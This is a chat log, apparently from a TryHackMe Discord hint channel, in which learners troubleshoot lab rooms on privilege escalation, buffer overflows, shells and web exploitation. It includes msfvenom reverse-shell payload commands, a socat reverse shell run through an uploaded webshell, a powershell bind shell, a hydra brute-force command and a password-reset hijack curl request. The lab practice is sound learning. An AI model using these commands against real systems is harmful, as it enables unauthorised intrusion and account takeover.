#room-hints
hmmmm, ok, might explain why it's not working for me. Instructions stated to download the bash executable, I googled .bashrc and that seemed to make sense from what I could see. Have I downloaded the wrong file, or have I missed something? Thanks TIA
Gave +1 Rep to @burnt rivet
Ah ok, I think I understand what you mean. I'll give it a go and see
Sorry, I'm getting really confused, as I don't seem to have those files from within the share mount point. I have a terminal connecting via SSH and can see it, there is a way I can download that file to my attackbox machine isn't there? I thought I remembered in a previous module about SSH downloads, but I may be mixing that up with Telnet or FTP, as I can't seem to find a way to download it
I've managed to get it copied across now, and it's appearing in the mounted share from my other terminal. Coffee time, then I'll try again with that rather than .bashrc (fingers crossed)
@alpine kestrel @burnt rivet Thank you, I got there in the end!
no problem
hey so I am doing John The Ripper room ( https://tryhackme.com/room/johntheripper0 ) and at task 5 question 1, answer was easy to guess because I was looking for 2 characters options, but I still cant get it how was I supposed to know it, can someone give me some hint on how should I actually figure it out ?, I really want to understand the tough process here, even earlier on I was using that python script provided and it was giving me few outputs and I had no good way of actually judging which is the right one, maybe I should use other tools to help me define hashing algorithm used ?
so I suppose the question there is - whats the best way to define hashing algorithm used in order to crack them with John -
i have a question regarding corridor. I solved the challenge. I just wanted clarification on the inner workings
Like what ?
in the walkthrough it gives 2 resources am pretty sure there are other resources but as long as they work it's good
Thanks, I might give that a go, but most importantly I want to make sure I am able to find it myself, while now it was just too easy based on 2 character guess
Gave +1 Rep to @glossy trail
what i do is look for possible hash algorithm, and the type, example `john --list=formats | grep -iF "ntlm"`
no problems and am also learning and doing the walkthrouh good luck in your journey
It's my second account, I removed first because of too many walkthroughs ;D now I just do my best to understand it all and check for hits as rarely as possible, good luck to you too!
Hi, would be grateful for some help. Doing Linux Fundamentals, Task 6, using grep command, I can't find the flag, it says file does not exist.
sorry its not letting me attach screen shot.... the command i typed was grep "THM*" access.log
You need to verify to screenshot.
!docs verify
Are you on the correct machine?
I'm confident I was on the right machine as I answered the previous question on same machine, loaded from Task 3. I have however terminated machines, closed down browser and started again and .... it worked first time. And thanks, I'm not verified
Well, you are now.
I did it on the machine and it worked.
Hello Guys,
I'm stuck in the room Pyramid of Pain, Task 5,
They ask me to use the Task 2 tools : VirusTotal etc... to find the malware hidden in the ip of the previous question (35.214.215.33)
On these tools, i cant find any malware or suspicious activy, is it normal ?
thanks
how i can get the flag of streamer? in my name discord
@ripe hedge can maybe give you some clarification on how to obtain the streamer role.
pretty sure you have to be a reasonable well known/influential streamer
Good evening folks,
I'm having a very weird problem in the Brainstorm room Task #1 question #2. How many ports are open? Sounds simple to me, but I've scanned the VM on multiple days from both my local machine, the attack box and the Kali VM. Every time I come up with 3 open ports: 21, 3389, and 9999. The room isn't accepting that as correct. I've used the following commands to no avail:
nc -p- <machine_IP>
nc -p- -Pn <machine_IP>
nc -vvv -p- -Pn <machine_IP>
nc -v -p- -T4 -Pn <machine_IP>
Below is a scan from literally 30 minutes ago. The target IP is the current, still running, VM.
# Nmap 7.60 scan initiated Wed Feb 8 22:20:33 2023 as: nmap -p- -vvv -oN nmap.scan 10.10.89.108
Increasing send delay for 10.10.89.108 from 0 to 5 due to 11 out of 31 dropped probes since last increase.
Increasing send delay for 10.10.89.108 from 5 to 10 due to 11 out of 35 dropped probes since last increase.
Nmap scan report for ip-10-10-89-108.eu-west-1.compute.internal (10.10.89.108)
Host is up, received arp-response (0.00044s latency).
Scanned at 2023-02-08 22:20:33 GMT for 2532s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 128
3389/tcp open ms-wbt-server syn-ack ttl 128
9999/tcp open abyss syn-ack ttl 128
MAC Address: 02:AA:A8:68:21:17 (Unknown)
Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Feb 8 23:02:46 2023 -- 1 IP address (1 host up) scanned in 2532.47 seconds
Am I missing something really dumb, or is there a glitch in the room?
Many thanks for the help.
yeah think that one is bugged if shadow recalls correctly
you can probably guess the number if you try
or you can check for udp ports
It's a single digit, so yeah I can guess it, but I wanted to ensure that I wasn't missing some learning point.
yeah that is fair
though the main purpose of that room is not to have fun with nmap but the priv esc
Over the last week I think I tried UDP scans, but it isn't in my notes. I'll give that a try again. Yeah I redid BOF_Prep like 5 times. New to Buffer Overflows, and I wanted to get it down. Brainstorm is the first time I've tried a download the program and run it locally. I'm looking forward to it.
Thanks @alpine kestrel
Gave +1 Rep to @alpine kestrel
hello everyone, i'm doing the agent sudo room, and i'm stuck at task 5, i can't find the CVE relative to the target kernel, i've searched in the websites that the exploit vulnerabilities room suggests but i couldn't find it. any websites suggestions to look at??
it is not a kernel vulnerability... check the version of sudo and you might be able to figure it out
also try and run sudo -l and search a bit about said output
ooh thank you very much @alpine kestrel
Gave +1 Rep to @alpine kestrel
no problem.... assume you got it now???
i got root but i still can't find the damn CVE lol ^^
if you are using exploit-db it states the cve on the exploit page
i tried all the relative cve that i found in exploit-db but none of them work, but i was looking using the kernel, i'll try with this vuln
yeah then maybe you did not get root the intended way
after all this room is quite old so it is vulnerable to quite a few exploits that are newer then the room
the intended one uses the sudo binary
which shadow thought the room name made obvious
hi all, working through Linux fundamentals part2-task 2, and cant log in using the password in the video, tried several times? have checked typing password in lower case, and its the only machine I can access in this lesson, any ideas would be helpful.
I just logged in so it's working.
So where im i going wrong.?????.
Looking for some advice on the linux priv esc task 11 NFS.
I can mount the share on the remote machine, create the file and compile the exploit on my kali laptop, copy it over, set it +s but when i try to run it from the machine itself, i get a GCC error
GLIB_C error
but i assumed it was compiled correctly on my machine when i made the exploit as there was nothing mentioned otherwise
gonna terminate it and start again
$ cd tmp
$ ls
nfs
snap.lxd
$ ./nfs
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)
i take it the VM has an old version compared to kali?
Hello everyone,
I need a hint or the command to get the information for the OWASP room, Title Injection v4, Task 5 (Command Injection Practical), question How many non-root/non-service/non-daemon users are there?
I did a search of a command and did a "cat /etc/passwd" and receive a list of users but not sure if I'm reading the output correctly to form a correct response to the answer.
First, do I have the right command/request to get the output I need, and second what am I looking for or how do I parse the output?
hey everyone. Im on 'Windows Local Persistence". Is this room buggy? I have been working this room for some time. Some times the exploits will not run. I have tried to run some tasks more than once to fully understand them, but they only work when they want to. I have checked my history to make sure I have duplicated the command correctly, But the room sometimes works and mostly it does not. any help please.
You have the correct command, check how /etc/passwd is made and where users are
hi can anybody help me with DVWA installation
Hey all! Completed the python for pentesters room just this week and went on to https://tryhackme.com/room/scripting, got through base64 even though that was a hassle too since i thought my script was messed up since the first 5 letters didn't change in around the first 30 loops.. But on to the problem i have atm in https://github.com/JormaWuorio/TryHackme/blob/master/gottacatchthemall.py.. I can get the ip and port number which i successfully connect to, but when i get to the looping part, i can randomly get through 1-3 operations and i can't for the life of me figure out the reason.. stacktrace is printing out something about connection refused, but i can't get to the root reason why it's disconnecting sometimes and on others it's not.. i'm also waiting for 4s on each loop so it should switch only after the port has closed.. also tried with 3 and 4.1 to try and compensate for lag and such but no dice.. One possible problem i have is i'm doing the loop with requests instead of sockets but somehow i doubt that's the case, even though i'm not sure where do i get the info to STOP if the port number is still not 9765.. Any tips on what to try?
Hi, still stuck with the 'Taunt' section of #Sakura room. I have the latest url of the deep web site as of today but the url is not working / saying the answer is correct. Anyone?
Anyone have any insight on https://tryhackme.com/room/crypted ?
I have the img file indexed and have looked everywhere I can think of for task one, even cracked 2 of the passwords in the shadow file but no luck with the right answer
I'm in Steel Mountain, Task 4. I downloaded the exploit, and adjusted the IP and Port. I still can't get a connection with http.server. What am I doing wrong? I also keep seeing a lot of people skip this particular exercise. So it's starting to make me wonder
it says the file is not found. Are you in the right directory and have the right file name ?
I have done this part so i'm sure it works fine.
Yep, copied and pasted the raw code from GitHub into nano. Made the necessary changes, and still nothing. Tried it like three different ways. I found other YouTube videos where other people have had similar issues, and they all skipped over this Task.
Dm me. I'll help you out with this.
I already closed everything. I appreciate you offering to help. You're welcome to DM me what I should do, though. But I followed three other YouTube videos, and all of them skipped over Task 4. They all said they were running into problems with it.
I copied the raw code from GitHub, and saved it as exploit.py after changing the IP address and Port. I started netcat listener in one terminal, and http.server in another. Did python2 exploit.py <target ip> 8080. And I got this error message.
just a sec. I am trying to find something that will help you. I already have it in this chat.
Sweet, thank you
Gave +1 Rep to @pine dust
Check your DM. Hope it helps.
Wow.
Do you mind giving me a hint ? I have been at it for long time.
Not sure where you are at with it but you have to mount the NFS server to get the img file. You can either use strings to search the binary or use something like Autopsy to index it. But there are some encrypted files inside the img that seem to be the only ones of importance and I don't know how to go about decrypting them (no clue what the encryption type is or the passcode/IV - I have some ideas of what I can check on next but I definitely need a break from it for a bit
Thanks. I do have the img file and tried using autopsy but I then moved on to learning autopsy first so I left this task. I am on to task 2. Any hint for this ?
Gave +1 Rep to @civic pilot
I was trying to exploit SMB since I didn't have much luck with web enumeration. But both seem like a dead end at the moment. Not sure when I'll come back to it yet
hello i am finishing Rick and MortyCTF and im trying to connect to ssh but i have this error R1ckRul3s@10.10.1.36: Permission denied (publickey). Am i on the right track?
okay thank you
Hi, the error message is telling you what the issue is. Is there a file called vol.py in that directory?
I dunno, ls doesn't work. I am using precisely the command I was told to use?
Could you share some screenshots please? And room url + task so that I can have a look
Are you using the attackbox or your own VM?
I am using the deployable machine in Task 3
https://tryhackme.com/room/volatility
Task 10, commands are found at 9 8 7 6
Btw. thank you for your help :)
In comparison
You are not in the right directory
When running a python command, you need to be in the directory that contains the file, or specify the full path to the file in your command
I tried to go to /opt/volatility3 too
ah no nevermind when I did that I had a typo 
thank you for your help
no worries, and you mentioned using "ls" earlier on and not seeing anything, you can use something like ls -la. This will list all files (even hidden ones)
uh, thank you for the tip! I will be sure to remember that. Thanks =)
Oh, another tip, you can use "tab" to autocomplete when you're typing file paths on the terminal. This can indicate if there is a typo or if the path is incorrect.
I didn't know that, thank you! That's a real time saver!
Gave +1 Rep to @unborn moon
Hello can anyone tell me about this problem in part 1 of windows fundamentals
"What is the keyboard shortcut to open Task Manager?"
i respond ctrl shift esc
and it's wrong
Tried "Control+shift+escape"?
thx
Gave +1 Rep to @rustic sphinx
it counts even when i put a backslash
path can be either relative or absolute, the python binary is smart enough to parse which is being passed
Thanks Juun, should've specified
Gave +1 Rep to @umbral umbra
it's all good, today has been a day of ridiculous meetings. My pedantic-antics level is off the charts because of it.
Haha, no worries!
hi, I'm trying BOF prep level 3 and when I give the address in EIP to jump to ESP it does not work! For example I sent this address "\xc7\x11\x50\x62" and in Immunity the address changes and the output is like this: 620D0AC7
hello how to get to login.php in Rick and Morty Capture the flag?
Have you tried your favourite forced directory browser?
Hi guys, I am trying to crack the private ssh key using johntheripper. When I am giving this command -
python ssh2john.py id_rsa > id_rsa.hash
It is giving me the following error - :
[id_rsa] couldn't parse the keyfile.
Where am I going wrong?
Can you share a screenshot of id_rsa ?
Just now I realized I only copied the main text, not the info like AES , begin ,end etc.
Thanks @pine dust
Gave +1 Rep to @pine dust
Hi,
i'm stuck with a step in Relevant chall
does anybody have 5 min to help me pinpoint it ?
trying to exploit my finding and cannot get a shell...
nobody for a hint for MSF ?
what room
I do relevant and i try to exploit one of the vuln without success since 1h
can you link the room
!docs verify
hmm
i didnt do that room. so can't tell for sure. sry
check #start-here to help you start
maybe i just use msf wrong
looks all good but i never get the reverse shell and the VM crash
[*] 10.10.230.156:445 - Receiving response from exploit packet
[-] 10.10.230.156:445 - Did not receive a response from exploit packet
https://tryhackme.com/room/windowslocalpersistence is broken if you are trying it on a Mac. I can't get Sticky Keys to trigger. Can someone please tell me what flags 14, 15, 16 are? I'm getting frustrated with this broken room!!!
Why can't you get sticky keys to work?
Evening all.... I'm struggling with task 4 on https://tryhackme.com/room/authenticationbypass
I think I am missing a step or something, as I haven't seen a popup, or change on the site after running the code in terminal. Is it supposed to give me a new webpage with the changes? There's an image on the task showing a change of email address, but I am not 100% sure how that happens :/
I tried to copy the outputted code, create an html file, but that didn't seem to work either, so I am a little lost.
Any pointers where I'm going wrong would be greatly appreciated
Hey guys I'm stuck with Walking An Application course Task 3 Question 3.
I need dome help
I mean some help
i am stuck on tryhackme shaker room, any tip?
What have you tried so far?
Where are you in the Shaker room exactly?
@young gulch i have compile exploit.java and upload exploit.xml on server,i have setup listener to 8888 and get exploit.class but i can't get reverse shell
i follow those steps for ldap marshaller
Do you understand how the exploit should work?
no exactly but i follow the steps
i have compile the exploit.java with latest jdk-default,17 version
no errors return
anyone can help me with brainstorm room? i downloaded chatserver.exe but i cannot open it on immunity debugger its saying i need 64bit
Are you using a 32bit system?
Last task
I ran searchsploit the server version and am having trouble running the exploits
hol up I'll do the room real quick
Thanks for the help in advance !
where are you stuck?
running the exploit?
can you post the command youre trying to execute?
@knotty peak
before my issue was i forgot to put python3 before running the python script but after I realized that I noticed that the code didnt make sense to me the comments are a little hard to read
I found an exploit written in C and can understand it a bit better
but I do not understand what I have to change to get it to work in my case
I got it with the python script so I can help you with that if you want to try it again
yea sure
ok so what were you executing?
since I couldnt read the code that smoothly I tried just running it with no changes and when I got the error:
File "29316.py", line 109 print "-> n0 w3bs3rv3r 0n %s" % (args.h) ^ SyntaxError: invalid syntax
how did you find out what script to run?
i ran nmap on the target machine to find the version used for the http service than used that to find exploits on searchsploit
So the room usually helps you find the way to exploit the vuln going back to question one for Task 5 start there
I can also hop in voice and help you there if you want to ask more questions
In the library rn so I wouldnt be able to talk but I could listen if its easier than typing everything
I'm fine with typing library probably not that great with talking
Okay yea lmao. I appreciate the help
No problem
Oh this is a lot better an easier then what I was doing lmao gotta remember not everything is super complicated
yeah I seem to be doing the same more often than not
I am able to get the exploit to work
thank you sm
if you dont mind I can send you a dm of the code i was trying to work with lmaoo
Haha no problem, yeah sure kinda curious
How do I do the plus rep thing here
Uh i think replying to me saying thanks work or +rep @<user>
+rep @magic moon
Gave +1 Rep to @magic moon
Again thank you for the help!
I will def bother you/this channel later so bye for now lmao
anytime, bye bye
Good morning all, curious question - How do I chase up a request for hint/help if I've not had a response? I don't want to be seen as spamming :/
Many thanks in advance
When/Where did you post it?
What are you trying to do?
I'm not a subscriber, so I cannot access the material.
oh ok, it's supposed to be exploiting a logic flaw in a website, and using curl, it should change what I see on the website, but I don't get that. I'm not sure if it is supposed to happen automatically, or if I need to reload the website somehow? I'm a little lost...
Make sure you are checking the right account's support tickets
hiya, sorry I'm not quite sure what you mean. Do you mean checking the right rooms? I posted in both the room-hints, and room-help, but not in the subs-room-help
I am talking about in the room for the logic flaw
Where are you stuck
after i made a curl request, the webpage didnt change
curl request 1 or 2
2, from what i can gather it's supposed to change the email address in the web page message
can you send the curl command you are using
curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com' used the example code
what message are you seeing
are changing machine_ip to the real one?
yeah, changed the ip address, i didn't receive any errors from the terminal, or on the website. I was expecting the message on the website to change to the attacker@hacker.com email address
I think you are good
Could someone give me a hint for KoTH Hackers on an entry point? I seem to be stuck bruteforcing my way in currently.
Also im not 100% certain my hydra syntax is correct for the ||/backdoor|| form
Could someone help me with this room https://tryhackme.com/room/metasploitexploitation#
I am on task 5
I looked at the hint and every time i try the exploit i am told the system isnt vulnerable
...login.php?
thats a 404
The issue appears to be the kali linux machine does not work but the attack box does.
hi guys i am having a problem in brainstorm room for bufferoverflow
i have tested the chatserver.exe and the script run perfect on local ip and i get a shell
when i change the script to my target machine ip i dont get a shell very weird any suggestion? i tried to restart the machine 2 times and still same
nvm worked it was the openvpn problem!! thank you guys
Hello, I can't finish this question in the "OSINT DOJO" room.
Everything I have tried has not worked.
Can someone help me ?
Check the hint.
Follow the link and check the image. Use the url from there as your answer.
Thank you for your answer. I tried with the url we find on the hint image, but it didn't work as well as the other answer I could find. That's why I'm asking for help on this discord...
Gave +1 Rep to @pine dust
Did you include the hash as well ?
Yes i did, I tried with the hash you can see on the image and the hash we can find on the different writeup.
DM me your answer.
The one with hash from the image. i want to see what's wrong.
Just a few characters wrong buddy. Also mark this message as spoiler please.
You have used i instead of j in 2 places.
Thanks for the answer ! It must be the text extractor that replaced it...
Sorry for bothering you with a problem like this.
Gave +1 Rep to @pine dust
Nah, It's fine. Happened with me as well when i used my camera to detect the text.
hahaha, it happens to the best, I guess.
Hi, is this where I can get help with the Linux Modules room? I'm on task 6 awk and I managed to get the required output exactly but they insist on the answer being in another format. I've tried reading all the links in the task including some of my own which I found online but I can't find the answer in the format that is required to pass. [edit] My answer is actually shorter than the required format.
Can you link the room?
Wow that was quick! Thanks! https://tryhackme.com/room/linuxmodules [Edit]It is task 6 awk the first question. I got the second question correct. [Edit2]Pardon me, it's the second question which is giving me problem, I got the third one correct.
hello i need help
they ask me to Execute the command from Example 8. Instead of the string Policy search for PowerShell. What is the name of the 3rd log provider?
Hello
I have a strange result from the nikto command in the room https://tryhackme.com/room/toolsrus
I use the command : nikto -h <server>:1234/manager/html -id bob:<password>
It says that the connection was successfully authenticated but the result only says that 1 Tomcat documentation was found but the expected value is 5 (I'd seen a writeup doying the same command and having another result)
Can someone explain what this command does the room isnt too helpful
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
Sets ups listener via windows socat
Hi guys, Im stuck on a question that I know is easy but having hard time figuring it out. Jr Pentesting / Walking An Application / Task 3 Viewing The Page Source / 3rd Question..... What is the directory listing flag? Thank you for your help.
Hey, what are you having a hard time figuring out? What have you tried? The more info you give us, the better we can help you
The question asks "What is the directory flag?" I am having trouble identifying the directory and therefore am not sure where to look for the flag. Hope that helps
What have you tried doing to identify the directory? Did you try using a tool?
ive opened all css/js files from page source. I also navigated through website and viewed all source code for those pages.
also added /.nav-collapse at end of url
also found flags for THM Static Labs & THM{CHANGE_DEFAULT_CREDENTIALS}
Hey, sorry was on the plane. You still need help?
unfortunately, yes
i tried adding /.nav-collapse at end of url and was redirected to Page Not Found. I then opened all links on source code but did not find flag. Also, viewed all pages to website and opened those source codes but no luck. I thought it would be the same process as the previous question "secret flag" but still stuck
OMG i got it. thank you ALL for the help, much appreciated.
Gave +1 Rep to @unborn moon
What's your port forward?
What do you mean?
I'm using ssh -L 2049:10.10.209.245:2049 -L 111:10.10.209.245:111 -L 20048:10.10.209.245:20048 paradox@10.10.209.245 -i id_rsa
That's a lot more than you need for the version of NFS in use
The IP that you use in the -L argument was important, I found
That's the box IP
So it should link my own localhost port to the localhost of the box, right?
Isn't it mount -t ntfs REMOTE_SHARE place_in_my_system?
So in this case, mount -t ntfs 127.0.0.1:/home/james /tmp/share_here
oops
nfs
my bad haha, typing error
Wait, I made that typing mistake in the earlier commands
thanks for your help haha
iirc it'll only talk v4
I think it's your pivot
You only need to forward one port, and the IP in the middle of the -L matters
only the 111? I'll try
No
The 2049?
Have you read into the changes from v3 to v4?
I now have
I've tried it with every port, but it isn't working
Thanks for your help @stuck fractal :)
Gave +1 Rep to @stuck fractal
@quick holly Please don't post images with flags in
@quick holly I think you get it what to do next!
I've actually found it
Hydra had an issue because it was version 9.1
so I've reinstalled it to 9.5
and I got the password using
hydra -l jason_test_account -P list.txt 10.10.204.250 http-post-form "/console/mfa.php:code=^PASS^:H=Cookie: PHPSESSID=l6jjj91qbp4867sesgnso2ti78; user=jason_test_account; pwd=abkr:Incorrect" -I -V
Thanks a lot for your help though :)
I appreciate it
Hydra version 9.1 gets stuck on HTTP-POST-FORM requests
No problem
okay bro
I'll see you then :)
yeah okay
but don't you think that bash scripting is easy to deal with?
It is
It was probably the right call to make back there
But I really want to get better at Hydra
so I'll push myself to use it more
and I think I found the reason why I was getting stuck everywhere haha
okay
Hello all! I'm in the Protocols and Servers room, Task 4: File Transfer Protocol. I'm able to connect to the target machine using FTP but am unable to grab the flag because it's saying permission denied. halp?
hi
Hey hey
I can help, if you'd like
But I need some more information
What username and password did you use?
and what exact commands did you run?
Hiya
Can someone assist me with the Windows Forensics 1 room?
I found the complete path where the python installer was run but having issues with the answer format
What is your answer ?
Mark it as spoiler.
Sure
||c:\users\thm-4n6\appdata\local\package cache{3182483d-078b-48fa-92c2-798baa1fe27d}\python-3.8.2.exe||
@pine dust ^
Don't you think it's longer than the expected answer. Look at the * in the input field.
no doubt I just dont..
wait
think I found it but there is something I'm not understanding
||z:\setups\python-3.8.2.exe||
why?
why the ||UserAssist|| artifact?
I thought I should be looking at ||AmCache||
I'm not smart enough to explain why. I guess i know why but i can be wrong.
give it a go
so the question asks about installation path... so I thought ||AmCache|| gives me that so for sure I'll look at that hive
but then it ends up being under ||NTUSER.DAT||... maybe I dont understand the type of info this hive can give me
Hello
Hey hey
If you need some help, it's best to ask and wait for an answer
they asked in #general and got guided here when their problem is with another ctf or cert exam thingy
Lol. Shadow just told you.
for operating security i am trying to input sammies password after inputing his ip in the attackbox and it's not working
been stuck on it since thursday
can someone help me in this question from AV evasion module from Red teaming path.
How do you view files in hex
On Linux fundamentals part 3 I went to wget the file I need to finish the questions it just loads forever
Have you started the python server on the correct directory?
I posted a more info about it in the subs-room
Cool, I can't see that room, so someone will help you there.
I was confused by this task - Firewalls Task 7
I don't fully understand where I should run the listener?
And what do they mean by localhost?
I drive into the command line on the server:
ncat -lvlp 8008 -c "ncap 10.11.7.31 80"
or
ncat -lvnp 8008 -c "ncat localhost 80"
And I have to send the command from my attacking machine:
nc 10.10.180.167 80
nc 10.10.180.167 8008
?My head is swollen.
Please help me figure out who passed it.
Hi All, I just completed the vulnerability capstone (https://tryhackme.com/room/vulnerabilitycapstone) which was a lot of fun. The only thing I struggled with was finding the correct exploit to use. I got a bit too focused on the wrong exploit (https://www.exploit-db.com/exploits/49487). I eventually used a hint and it had a completely different exploit in it (which worked immediately).
So my question is - how was I supposed to find this exploit? The way I found the others was to use the command searchsploit fuel but given that the exploit in the hint doesn't have the word fuel in it, I'd guess I'd need to use something more like this: `find / -type f -exec grep -H 'fuel' {} \;`
Is this correct or am I doing this totally inefficiently? Thanks for any hints!
Hi All! I'm in the Network Services room, Task 6: Enumerating Telnet. I'm trying to scan the target but it's taking an hour or more for nmap to finish. Just wondering if this is normal or if I'm using the wrong flags. This is the command: nmap -vv -sS -p- [ip]
It will take ages because you're scanning all 65+K ports.
You can also use speed flags in the form of -T1-5, 1 being the slowest, 5 being the fastest.
I'd suggest you just do
nmap -T4 -p- $targetip
Thanks! I'll try that
hey im doing the bugged room. I have figured out most of it but not sure on certain parts
Have a look in #1081290200128434256
thanks! I figured out anyway. Very interesting room.
Gave +1 Rep to @lucid junco
I am having issue with this room https://tryhackme.com/room/introtoshells#
I would like some help on how to upload a precompiled socat binary in order to set up a socat bind shell
Steps followed:
Uploaded a php file that allows me to send commands via the url
Uploaded a socat binary (found in the room)
Set up a reverse shell on my computer using socat TCP-L:4444 FILE:'tty',raw,echo=0
I then tried this http://TARGETIP/uploads/rshell.php?cmd=socat%20TCP%3AATTACKBOXIP%3A4444%20EXEC%3A%22bash%20-li%22%2Cpty%2Cstderr%2Csigint%2Csetsid%2Csane
I then get an error socat[11708] E open("tty", 02, 0666): No such file or directory
I understand what the error is saying but I dont know where the file is supposed to be
The room says " we are passing in the current tty file" but I am not sure what file it is referencing
It's supposed to be backticks
Like `
not sure what you mean
tty is a command
Replace the single quotes with backticks
What is your issue?
You'll get an answer faster if you just state the issue.
I don't understand how to look at the interesting documents on the SMB part
I see we could try to connect with Anonymous account
But I don't know how I can find the password
Anonymous doesn't need one.
Just hit enter.
I'm sure the task description mentions it, but not 100%
I got this when I push enter :
||root@ip-10-10-54-146:~# smbclient //10.10.55.152/secret -U Anonymous -p 445
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\Anonymous's password:
tree connect failed: NT_STATUS_BAD_NETWORK_NAME||
smbclient //10.10.55.152/profiles -U Anonymous
Try that command
Sorry, that wink face seems patronising.
thanks
Did it work?
You had /secret in your ip.
Secret was only used on the last question as an example of the syntax you'd use.
Why do we have to go to profiles and not secret ?
Ok thanks
But in that case, when we type //10.10.55.152/profiles is it not to specify the directory where we want to connect ?
Yes. During the enumeration stage, profiles was a share that stuck out.
Which commands can we use when we are connected ?
I would like to use cat or something to read text files...
I think more is used to read files in smb.
good one thanks
more "filename.txt"
Speech marks are needed.
I tried less
Did that work?
Sometimes I can only remember the commands when I'm on it
yes perfect
Sorry to bother you @lucid junco but... How can I download a file... scp doesn't work and scopy doesn't seem to be the one...
Do you need to download the file, or just read it?
download it
Here the instructions :
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".
Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
Thank you so much
Gave +1 Rep to @young gulch
I think it's mget or get
Hi, can someone point out what am i doing wrong?
Thanks, when you said it i noticed it instantly i didn't select the actual file
Gave +1 Rep to @burnt rivet
Hi, I'm running this command
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o shell.exe -a x64 --platform windows LHOST=10.10.250.29 LPORT=1234
Then when I transfer the file over to Windows and run it I get: This app can't run on your PC. To find a version with your PC, check with the software publisher.
Can anyone see anything I'm doing wrong here. The windows box is a THM box for this specific exercise and I've confirmed it's x64 arch. All the walkthroughs say this should work but alas not!
just for the meeps of it try x32/x86
Thanks for the reply - On it! I'll report back.
Gave +1 Rep to @alpine kestrel
Darn - same thing! I used this command: msfvenom -p windows/meterpreter_reverse_tcp -f exe -o shell32.exe LHOST=10.10.250.29 LPORT=1234. Really strange.
well it was worth a shot
agreed! Thanks for the suggestions.
At this point I'm wondering if I've hit some sort of a bug or something. Like maybe the THM box isn't working the way it should. The online guides seem to have no problems with this exercise
Gave +1 Rep to @alpine kestrel
thanks for the input! I was using a multi/handler and ran set payload windows/x64/meterpreter/reverse_tcp then show options. Nothing really stood out to help here to be honest. I actually can't even get to the stage where the EXE even tries to hit the handler, it just fails to load entirely
Gave +1 Rep to @burnt rivet
Ok I'll double check that again now, thanks
darn - same thing. I tried with a multihandler and a netcat listener. No traffic from that windows box on that port at all, so I'm pretty sure the exe isn't even starting. I'm going to look into whether there's a debug output or something I can tap into for the exe to see if it's doing anything weird
+Rep @lucid junco
Gave +1 Rep to @lucid junco
I found some search code and used it to filter but most of the videos on YT just show the log/answer. You have to use the -Path "C:\Users\Administrator\Desktop\merged.evtx" instead of -LogName https://kurtroggen.wordpress.com/2017/05/17/powershell-security-powershell-downgrade-attacks/
I'm a little confused? 🤔 keep saying am wrong by inputting Suite or Updates
Hey, the answer format is 4 characters, so both those answers can't be correct
I understand that, but nothing is 4 character long, that's where am stuck.
What room and task is it? Have you found anything online?
burp suite room task 7, not I have not looked yet, don't want to just get it off the net, rather someone who might know might simply give me a hint
The answer is in the text above the questions
Thank you "MISc"
Gave +1 Rep to @unborn moon
There is a section that discusses the 4 main sub sections of the user options tab
Hey all ,need some help ,
Basic Malware RE task2
i use my own kali and i download the file and use the strings command and inject it to txt file then sort it but how I find the right flag?
on the internet i find many use "ida" tool but i don't have it on my kali
i'm doing the room using ghidra (a free alternative, you can install it following the steps here: https://github.com/NationalSecurityAgency/ghidra#install)
starting on the first function of strings2.exe (entry)
yes, thanks i find a git clone in github
and use a guide i find
it is interesting but for first time like "where i start"
there are some declarations, starting with a char and ending with a pointer
||the undefined variables get hexadecimals values which u need to use a converter to get the flag back, the first variable u already have, it's a F||
as follows:
||local_2c = 'F';||
||local_2b = 0x4c;||
||local_2a = 0x41;||
etc
||with all values being one byte long, u can assume they are ascii chars||
Im working on the what the shell room and the task where I am to try one of the payloads from the payload of all things github and I am a bit confused on how to use them
I created a .elf file but I am not sure how I am supposed to use it for a meterpreter shell
What payload did you use?
Linux Stageless reverse TCP
Post the full name of it please e.g linux/....
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf >reverse.elf
That's not a meterpreter payload, thus the shell you catch is not a meterpreter shell
So all I would need is a normal nc listner?
I think for that one, you could even catch it with nc, but not sure anymore.
But since you asked about meterpreter, I suggest you use msfconsole to catch the shell, since meterpreter is a metasploit thing
okay thanks
Gave +1 Rep to @left thunder
Hello everyone,
I'm having a little trouble with webenum1 and gobuster vhost task 6.
With a little help I was able to do the -append-domain to get the vhosts correctly, but now I don't know how to do a dir scan for the flag in the vhosts. I was told I will need to edit my /etc/hosts file but I don't know what the IP address is of the 2 vhosts I want to scan.
Any help would be appreciated... how do I find/get the IP addresses of the vhosts if I need to add them to my /etc/hosts file?
gobuster vhost is the command with some parameters. It's part of gobuster.
I think I found an answer/hint that I'll try.
to edit /etc/hosts
Sorry, I thought I mentioned gobuster in my initial post.
I'm still a little new and learning... I'm not sure what you were trying to ask about what is a vhost then. I understand that it means virtual host and that it's not just a gobuster thing but in this context I'm not sure what you're asking.
It looks like the edit I made to the /etc/hosts file is working now.
I have a little more to learn and research with the /etc/hosts file and adding the vhost names to the same IP.
like how/why:
xxx.xxx.xxx.xxx webenum.thm extra1.webenum.thm extra2.webenum.thm
works. I get the "extras" are the virtual hosts. Would *.webenum.thm still work instead of having to spell out all the vhosts? I guess I can try it out and test it for myself.
HI I need help with the what the shell room https://tryhackme.com/room/introtoshells#
I am using the kali web based machine on THM
I am on task 13 I am having trouble with getting bind shells on the windows machine:
I have successfully obtained a reverse-shell with netcat and socat
I uploaded a webshell which I used to get the reverse shell with nc and socat
But when I try to use this command (on my current reverse shell) socat TCP-L:4444 EXEC:powershell.exe,pipes on the reverse shell when I run this command TCP:<target ip>:<4444> - i get socat[22548] E connect(5, AF=2 10.10.12.59:4444, 16): Connection refused
If I try the same command url encoded for the webshell i uploaded I get the same response when I try to connect back
Netcat:
When I run a listener on my kali machine using nc -nlvp 4444 and attempt to connect back to this via the reverse shell i had previously caught I do not receive the connection back
